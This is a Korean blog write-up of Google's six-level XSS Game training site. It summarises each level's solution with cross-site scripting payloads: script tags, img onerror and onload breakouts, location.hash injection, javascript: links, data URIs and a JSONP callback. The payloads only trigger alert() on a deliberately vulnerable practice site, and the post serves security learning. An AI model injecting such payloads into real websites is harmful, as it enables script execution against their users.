Search

XSS-Game Write-Up (6/6)

XSS-GAME?

구글에서 만든 XSS(Cross-site Script) 버그를 확인할 수 있는 게임 사이트로 총 6문제로 이루어져있는 짧은 워게임 사이트다.
취약한 실제 응용 프로그램과 유사한 여러 수준으로 구성돼있고, CTF에 비하면 난이도는 쉽지만 XSS 개념을 정립하기에는 충분한 난이도로 구성됐다. 개발자 도구로 내부 코드를 조정하거나 트래픽을 조작(예: Burp Suite)하면 쉽게 풀 수 있지만 권장하지 않는다고 한다. (개발자도구를 사용하지 말라는 뜻이 아니다)
XSS game
https://xss-game.appspot.com/
위 링크로 접속하면 바로 체험이 가능하다.

타임라인

23.04.06. 시작
23.04.07 완료

문제 목표

각 문제명을 클릭하면 풀이로 이동합니다.
붉은 글씨는 나중에도 충분히 참조할만한(까먹을만한) 내용이 있는 경우 표시했습니다.
문제
핵심 목표
Level 1: Hello, world of XSS
기본 XSS 코드 <script> alert('hello'); </script>
Level 2: Persistence is key
img onerror <img src = "#" onerror = "alert('1');">
Level 3: That sinking feeling...
window.location.hash frame#' onerror='alert(1)'
Level 4: Context matters
img onload onload="startTimer('{{'); alert('hello}}');"
Level 5: Breaking protocol
url href javascript:alert(1)
Level 6: Follow the
Data URIs data:javascript,alert(1) / JSONP callback

XSS 기법

✓ 기본

<script> alert('hello'); </script>
XSS-Game Level 1: Hello, world of XSS

✓ img onerror

이미지를 로딩하는 부분이 있거나, script 문자열을 필터링할 경우
<img src = "#" onerror = "alert('1');">
XSS-Game Level 2: Persistence is key

✓ window.location.hash

window.location.hash는 현재 페이지 URL의 조각 식별자("#" 기호 뒤에 오는 URL 부분)를 나타내는 JavaScript의 window객체 속성
#sampe=' onerror='alert(1)’
#sample=<div id="xss">alert('xss');<div>
#sample=<img src%3D/%20onerror%3Dalert(1)>
XSS-Game Level 3: That sinking feeling...

✓ img onload

onload는 이미지 로드가 완료되었을 때 실행할 JavaScript 함수를 지정
<img src="/static/loading.gif" onload="startTimer(’{{timer}}');" /> <img src="/static/loading.gif" onload="startTimer('{{'); alert('hello}}');" />
XSS-Game Level 4: Context matters

✓ URL href

<a href=”javascript:alert(1)">
XSS-Game Level 5: Breaking protocol

✓ Data URIs

간단한 text/plain 데이터
data:,Hello%2C%20World!
위 예제의 base64 인코딩 버전
data:text/plain;base64,SGVsbG8sIFdvcmxkIQ%3D%3D
<h1>Hello, World!</h1>인 HTML 문서
data:text/html,%3Ch1%3EHello%2C%20World!%3C%2Fh1%3E
자바스크립트 alert 실행 문서
data:text/html,<script>alert('hi');</script>
data:,alert(1)
data:javascript,alert(1)
XSS-Game Level 6: Follow the 🐇

✓ JSONP(JSON with Padding)

http://xss-game…./frame#https://www.google.com/jsapi?callback=alert
XSS-Game Level 6: Follow the 🐇

✓ 다른 [워게임] 포스트

WebHacking.kr Challenge Write-Up (70/80)
In progress
WebHacking.kr Challenge Write-Up (70/80)
In progress
Splunk.BOTS / Boss of the SOC Ver.1 Write-Up (30/30)
Done
Splunk.BOTS / Boss of the SOC Ver.1 Write-Up (30/30)
Done
Splunk.BOTS / Corelight Parter Experience Write-Up (43/43)
Done
Splunk.BOTS / Corelight Parter Experience Write-Up (43/43)
Done
XSS-Game Write-Up (6/6)
Done
XSS-Game Write-Up (6/6)
Done
WebHacking.kr Challenge BABY
Done
WebHacking.kr Challenge BABY
Done
WebHacking.kr Challenge g00gle1
Done
WebHacking.kr Challenge g00gle1
Done
WebHacking.kr Challenge g00gle2
Done
WebHacking.kr Challenge g00gle2
Done
WebHacking.kr Challenge old-01
WebHacking.kr Challenge old-01
WebHacking.kr Challenge old-02
WebHacking.kr Challenge old-02
WebHacking.kr Challenge old-03
WebHacking.kr Challenge old-03
Load more
︎ 더 많은 게시물을 보려면
Blog - AbsolRoot
︎ 작성자가 궁금하면?
박필근 | AbsolRoot
 2023. absolroot all rights reserved.